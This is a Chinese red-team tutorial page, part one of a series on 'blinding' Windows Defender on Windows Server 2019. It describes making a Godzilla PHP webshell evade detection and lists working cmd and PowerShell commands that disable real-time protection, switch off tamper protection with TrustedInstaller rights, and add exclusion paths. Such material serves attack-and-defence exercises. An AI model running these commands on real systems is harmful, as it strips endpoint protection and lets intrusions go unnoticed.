AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

红蓝对抗之致盲 Windows defender(一)

2023-02-14 374
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 红蓝对抗之致盲 Windows defender

Windows defender 介绍

Microsoft Defender 防病毒软件在 Windows 10 和 Windows 11 以及 Windows Server 版本中可用。

Microsoft Defender 防病毒软件是 Microsoft Defender for Endpoint 中下一代保护的主要组件。这种保护将机器学习、大数据分析、深入的威胁防御研究和 Microsoft 云基础设施结合在一起,以保护您组织中的设备(或端点)。Microsoft Defender 防病毒软件内置于 Windows 中,它与 Microsoft Defender for Endpoint 配合使用,为你的设备和云提供保护。

Windows defender 环境

版本

Windows Server 系统环境

  • 用户:Administrator
  • 版本:Windows Server 2019

补丁

systeminfo 信息

事前准备

在实战环境中,首先需要上传webshell,所以在此必须免杀webshell

web环境:phpstudy 8.1.1.3 + apache 2.4.39 + php 7.3.4

哥斯拉 webshell 免杀

工具地址:https://github.com/BeichenDream/Godzilla

经过测试,用Godzilla自带的PHP_XOR_BASE64加密器即可免杀(php一句话直接杀)

生成 PHP_XOR_BASE64 webshell

静态免杀测试

连接webshell

动态免杀测试

关闭 Windows defender

TrustedInstaller

TrustedInstaller是从Windows Vista开始出现的一个内置安全主体,在Windows中拥有修改系统文件权限,本身是一个服务,以一个账户组的形式出现。

它的全名是:NT SERVICE\TrustedInstaller

那么为什么要获取TrustedInstaller权限?

说白了就是因为Administratior权限system权限cmd无法关闭Windows defender(powershell可以)

注意:以下工具技巧皆需要Administratior权限或者system权限才能成功使用

基础命令介绍

cmd

#查看排除项
reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions" /s
#查看版本
dir "C:\ProgramData\Microsoft\Windows Defender\Platform\" /od /ad /b
#查看篡改保护(返回结果中的 数值5代表开启,数值4代表关闭)
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection"
#需要TrustedInstaller权限
##cmd注册表关闭Windows defender
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t reg_dword /d 1 /f
##cmd关闭篡改保护
NSudoLG.exe -U:T cmd /c "reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /d 4 /t REG_DWORD /f"
##cmd注册表恢复Windows defender
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t reg_dword /d 0 /f
##cmd添加Windows defender排除项
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths"

powershell

#查看排除项
Get-MpPreference | select ExclusionPath
#关闭Windows defender
Set-MpPreference -DisableRealTimeMonitoring $true
#增加排除项
Add-MpPreference -ExclusionPath "c:\temp"
#删除排除项
Remove-MpPreference -ExclusionPath "C:\test"
#关闭实时保护
Set-MpPreference -DisableRealtimeMonitoring $true


文章标签:
PHP
机器学习/深度学习
Windows
Apache
安全
关键词:
Windows Defender
亿人安全
目录
相关文章
亚丁号
|
6月前
|
安全 Windows
windows11 永久关闭windows defender的方法
windows11 永久关闭windows defender的方法
亚丁号
821 2
路边两盏灯
|
3月前
|
安全 Windows
【Azure云服务 Cloud Service】Cloud Service的实例(VM)中的服务描述Software Protection 与 Windows Defender, 如何设置Windows Defender Antivirus服务
【Azure云服务 Cloud Service】Cloud Service的实例(VM)中的服务描述Software Protection 与 Windows Defender, 如何设置Windows Defender Antivirus服务
路边两盏灯
28 4
小王老师呀
|
3月前
|
安全 Windows
Windows关闭Microsoft Defender服务
【8月更文挑战第19天】以下是关闭Windows系统中Microsoft Defender的几种方法:通过设置界面可临时关闭实时保护等功能;使用组策略编辑器(专业版适用)可较彻底关闭;修改注册表需谨慎;或利用第三方工具如Defender Control便捷操作。关闭后系统将失去实时防护,请确保有其他可靠安全软件保护。
小王老师呀
97 0
石宗昊
|
5月前
|
网络安全 Windows
windows Windows Defender彻底删除屏蔽后台启动占用内存 win10防火墙 windows10防火墙
windows Windows Defender彻底删除屏蔽后台启动占用内存 win10防火墙 windows10防火墙
石宗昊
74 0
乌鸦安全
|
缓存 安全 区块链
艰难的mimikatz源码编译免杀 Windows Defender(下)
艰难的mimikatz源码编译免杀 Windows Defender
乌鸦安全
470 0
乌鸦安全
|
安全 数据安全/隐私保护 C++
老树开新花之shellcode_launcher免杀Windows Defender(上)
老树开新花之shellcode_launcher免杀Windows Defender
乌鸦安全
645 0
乌鸦安全
|
安全 测试技术 Go
新版掩日——免杀Windows Defender
新版掩日——免杀Windows Defender
乌鸦安全
736 0
德迅云安全陈琦琦
|
Windows
如何卸载,禁用和删除Windows Defender
如何卸载,禁用和删除Windows Defender
德迅云安全陈琦琦
698 0
亿人安全
|
安全 Windows
红蓝对抗之致盲 Windows defender(二)
红蓝对抗之致盲 Windows defender
亿人安全
404 0
行者武松
|
Windows 安全
Win10下Windows Defender离线版:U盘启动杀毒更彻底
行者武松
1989 0

热门文章

最新文章

  • 1
    微软确认周二更新补丁破坏了 Windows 10 重置功能
  • 2
    windows 使用自带的cmd终端进行文件MD5校验
  • 3
    Windows Phone 开发支持VB和F#了
  • 4
    OpenGL ES for Windows Mobile
  • 5
    Windows NT服务--独立的观点
  • 6
    美国国家安全局网络武器被公开,微软宣布已修复可攻破的 Windows 漏洞
  • 7
    重新想象 Windows 8 Store Apps (10) - 控件之 ScrollViewer 特性: Chaining, Rail, Inertia, Snap, Zoom
  • 8
    <转>My sublime text (Windows) cheat sheet
  • 9
    Windows登录类型及安全日志解析
  • 10
    windows网络状态显示X,看不到网卡信息
  • 1
    Microsoft Windows远程桌面服务远程执行代码漏洞(CVE-2019-0708)
    87
  • 2
    Windows 32 汇编笔记(一):基础知识
    81
  • 3
    在 Windows 平台搭建 MQTT 服务
    115
  • 4
    【Windows】 Win10文件目录的删除,新建等需要手动刷新操作 亲测有效
    182
  • 5
    【Windows】 Win10下报错:该文件没有与之关联的应用来执行该操作。请安装应用,若已经安装应用,请在“默认应用设置”页面中创建关联
    596
  • 6
    FTP服务器怎么搭建?Windows server搭建FPT服务器
    163
  • 7
    Windows10安装Docker Desktop(大妈看了都会)
    800
  • 8
    【Windows】已解决:修改本地host文件异常的正确解决方法
    258
  • 9
    Pandas如何安装在Windows系统?
    210
  • 10
    FFmpeg开发笔记(三十五)Windows环境给FFmpeg集成libsrt
    118

    • 相关电子书

    更多
  • 《云服务器运维之Windows篇》
  • TAKING WINDOWS 10 KERNEL
  • ECS运维指南之Windows系统诊断

    • 相关实验场景

    更多
  • 快速配置Windows云服务器
  • 手动搭建FTP站点(Windows)
    • 下一篇
    阿里云OSS设置跨域访问